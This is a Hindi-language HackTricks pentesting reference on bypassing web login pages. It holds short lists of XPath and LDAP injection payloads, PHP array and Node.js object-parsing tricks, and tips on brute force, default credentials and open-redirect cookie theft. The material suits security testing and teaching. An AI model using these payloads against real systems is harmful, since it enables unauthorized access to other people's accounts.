Login Bypass
Reading time: 5 minutes
tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाएँ देखें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।
नियमित लॉगिन बायपास करें
यदि आप एक लॉगिन पृष्ठ पाते हैं, तो यहां कुछ तकनीकें हैं जिन्हें आप बायपास करने के लिए आजमा सकते हैं:
- पृष्ठ के अंदर टिप्पणियों की जांच करें (नीचे और दाईं ओर स्क्रॉल करें?)
- जांचें कि क्या आप प्रतिबंधित पृष्ठों तक प्रत्यक्ष पहुंच प्राप्त कर सकते हैं
- जांचें कि पैरामीटर न भेजें (कोई भी न भेजें या केवल 1)
- PHP तुलना त्रुटि की जांच करें:
user[]=a&pwd=b
,user=a&pwd[]=b
,user[]=a&pwd[]=b
- सामग्री प्रकार को json में बदलें और json मान भेजें (bool true शामिल)
- यदि आपको एक प्रतिक्रिया मिलती है जो कहती है कि POST समर्थित नहीं है, तो आप GET अनुरोध के साथ शरीर में JSON भेजने की कोशिश कर सकते हैं
Content-Type: application/json
- nodejs संभावित पार्सिंग त्रुटि की जांच करें (पढ़ें यहां):
password[password]=1
- Nodejs उस पेलोड को एक क्वेरी में बदल देगा जो निम्नलिखित के समान है:
SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``
password=password=1
;
जो पासवर्ड बिट को हमेशा सत्य बनाता है। - यदि आप एक JSON ऑब्जेक्ट भेज सकते हैं, तो आप लॉगिन बायपास करने के लिए
"password":{"password": 1}
भेज सकते हैं। - याद रखें कि इस लॉगिन को बायपास करने के लिए आपको अभी भी एक मान्य उपयोगकर्ता नाम जानने और भेजने की आवश्यकता है।
mysql.createConnection
को कॉल करते समय"stringifyObjects":true
विकल्प जोड़ने से अंततः जबObject
पैरामीटर में पास किया जाता है तो सभी अप्रत्याशित व्यवहारों को रोक देगा।- क्रेडेंशियल्स की जांच करें:
- डिफ़ॉल्ट क्रेडेंशियल्स का उपयोग की गई तकनीक/प्लेटफ़ॉर्म
- सामान्य संयोजन (रूट, एडमिन, पासवर्ड, तकनीक का नाम, इनमें से किसी एक पासवर्ड के साथ डिफ़ॉल्ट उपयोगकर्ता)।
- Cewl का उपयोग करके एक शब्दकोश बनाएं, डिफ़ॉल्ट उपयोगकर्ता नाम और पासवर्ड (यदि है) जोड़ें और सभी शब्दों का उपयोग करके इसे ब्रूट-फोर्स करने की कोशिश करें उपयोगकर्ता नाम और पासवर्ड
- बड़े शब्दकोश का उपयोग करके ब्रूट-फोर्स करें (ब्रूट फोर्स)
SQL Injection प्रमाणीकरण बायपास
यहां आप SQL इंजेक्शन के माध्यम से लॉगिन बायपास करने के लिए कई तरकीबें पा सकते हैं।
अगली पृष्ठ पर आप SQL इंजेक्शन के माध्यम से लॉगिन बायपास करने के लिए एक कस्टम सूची पा सकते हैं:
No SQL Injection प्रमाणीकरण बायपास
यहां आप No SQL इंजेक्शन के माध्यम से लॉगिन बायपास करने के लिए कई तरकीबें पा सकते हैं।
चूंकि NoSQL इंजेक्शन को पैरामीटर मान बदलने की आवश्यकता होती है, आपको उन्हें मैन्युअल रूप से परीक्षण करने की आवश्यकता होगी।
XPath Injection प्रमाणीकरण बायपास
यहां आप XPath इंजेक्शन के माध्यम से लॉगिन बायपास करने के लिए कई तरकीबें पा सकते हैं
' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2
LDAP Injection प्रमाणीकरण बाईपास
यहाँ आप LDAP Injection के माध्यम से लॉगिन बाईपास करने के लिए कई तरकीबें पा सकते हैं।
*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|
Remember Me
यदि पृष्ठ में "Remember Me" कार्यक्षमता है, तो जांचें कि इसे कैसे लागू किया गया है और देखें कि क्या आप इसका दुरुपयोग करके अन्य खातों पर नियंत्रण प्राप्त कर सकते हैं।
Redirects
पृष्ठ आमतौर पर लॉगिन के बाद उपयोगकर्ताओं को रीडायरेक्ट करते हैं, जांचें कि क्या आप उस रीडायरेक्ट को बदल सकते हैं ताकि Open Redirect का कारण बन सके। शायद आप कुछ जानकारी (कोड, कुकीज़...) चुरा सकते हैं यदि आप उपयोगकर्ता को अपने वेब पर रीडायरेक्ट करते हैं।
Other Checks
- जांचें कि क्या आप लॉगिन कार्यक्षमता का दुरुपयोग करके उपयोगकर्ता नामों की गणना कर सकते हैं।
- जांचें कि क्या पासवर्ड/संवेदनशील जानकारी फॉर्म इनपुट:
<input autocomplete="false">
में स्वतः पूर्णता सक्रिय है।
Automatic Tools
tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाएँ देखें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।